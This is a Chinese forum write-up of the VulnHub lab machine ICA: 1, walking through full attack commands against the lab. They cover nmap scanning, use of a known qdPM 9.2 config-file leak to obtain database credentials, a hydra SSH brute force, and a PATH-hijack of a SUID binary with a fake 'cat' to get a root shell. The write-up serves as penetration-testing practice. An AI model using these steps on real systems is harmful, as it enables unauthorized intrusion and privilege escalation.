电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

[内网安全分享] vunlnhub靶机之 ICA:1

[复制链接]
 楼主| zhaorong 发表于 2022-5-30 14:40:22 | 显示全部楼层 |阅读模式
简介

靶机下载地址:ICA: 1 ~ VulnHub

靶机简介:根据我们情报网的信息,ICA正在进行一个秘密项目。我们需要找出该项目是什么。一旦你得到访问信息
就把它们发给我们。我们稍后会放置一个后门来访问该系统。你只需专注于该项目是什么。你可能要通过几层安全保
障中情局完全相信你会成功完成这项任务。好运,特工!

难度: 简单

探测IP,扫描端口

netdiscover -r 192.168.81.0/24

QQ截图20220530141110.png

nmap -A 192.168.81.150

QQ截图20220530141141.png

开启了80、22、3306,先来查看一下网页

探测80端口信息

查看页面

为一个登录页面,看到qdPM9.2。

QQ截图20220530141242.png

不了解该软件系统,百度搜索 https://codingdict.com/os/software/63511得知这是一个开源项目管理系统。

探测该软件系统漏洞

searchsploit qdPM  9.2     
   
发现有该版本存在漏洞:密码暴露

2610.png

查看漏洞利用

cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
翻译一下:数据库的密码和连接字符串存储在一个 yml 文件中。要访问该yml文件你可以
到http://<website>/core/config/databases.yml文件并下载。

2609.png

访问页面获取到了数据库账号密码(因为是纯字母,所以不需要url解码)

qdpmadmin:UcVQCMQk2STVeS6J

666.png

登录数据库

mysql -h 192.168.81.150 -u qdpmadmin -p   

探索有用的信息

819.png

在qdpm的配置文件中找到了管理员的账号和密码

662.png

但是无法破解密码。

终于在staff数据库下的user表和login表发现信息。

661.png

其中login的password有对应的user_id

我们整理一下,并用base64解码

Smith :WDdNUWtQM1cyOWZld0hkQw     //解码为X7MQkP3W29fewHdC
Lucas: c3VSSkFkR3dMcDhkeTNyRg   //解码为suRJAdGwLp8dy3rF
Travis:REpjZVZ5OThXMjhZN3dMZw   //解码为DJceVy98W28Y7wLg
Dexter:N1p3VjRxdGc0MmNtVVhHWA   //解码为7ZwV4qtg42cmUXGX
Meyer:Y3FObkJXQ0J5UzJEdUpTeQ   //解码为cqNnBWCByS2DuJSy

爆破一下密码

hydra -L user.txt -P passwd.txt ssh://192.168.81.150 -t 4 -vV

由于大写得不到密码,我尝试修改为了小写,爆破成功

660.png

登录ssh,搜集信息

登录travis

ssh travis@192.168.81.150//登录travis

121.png

得到一条flag

查看一下有suid的指令和sudo的权限

/usr/bin$ find / -perm -u=s -type f 2>/dev/null

113.png

查看一下sudo权限

sudo -l

51.png

都没有可利用的点。

切换用户dexter

ssh dexter@192.168.81.150 //登录Dexter

49.png

得到一条提示:翻译一下---->在我看来,在访问系统时有一个弱点。
据我所知,可执行文件的内容是可以部分查看的。
我需要弄清楚是否存在漏洞。           //没搞懂

同样查看一下suid的命令

48.png

发现get_access比较可疑,经查看是一个有s位的可执行文件,验证了刚才note.txt里的话

29.png

note提示说可执行文件的内容是可以部分查看的,我们查看一下

cat get_acces  

28.png

发现全是乱码,我们用string查看一下,发现有一个cat查看了root的系统信息

26.png

这里的漏洞是,由于程序没有使用绝对路径进行调用cat,我们可以制作一个恶意的cat文件
运行get_access市调用它。

提权

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
./get_access

22.png

这样一来,系统会首先调用path靠前的命令,就会调用到我们制作的”恶意cat“

现在我们切换到了root用户(因为市以root权限执行的/bin/bash,所以就会直接切换到root的shell)

12.png

由于我们把cat文件的执行命令路径替换到了,所以用more来查看第二天flag

11.png

完成:获得了两条flag

补充

关于/bin/bash:这是一个开启shell的命令,以谁的权限执行就会登陆到谁的shell。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 07:09

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表